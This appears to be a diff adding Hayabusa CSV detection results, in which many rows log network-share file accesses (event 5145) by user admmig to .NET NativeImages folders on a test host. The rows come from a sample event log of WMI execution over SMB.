+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
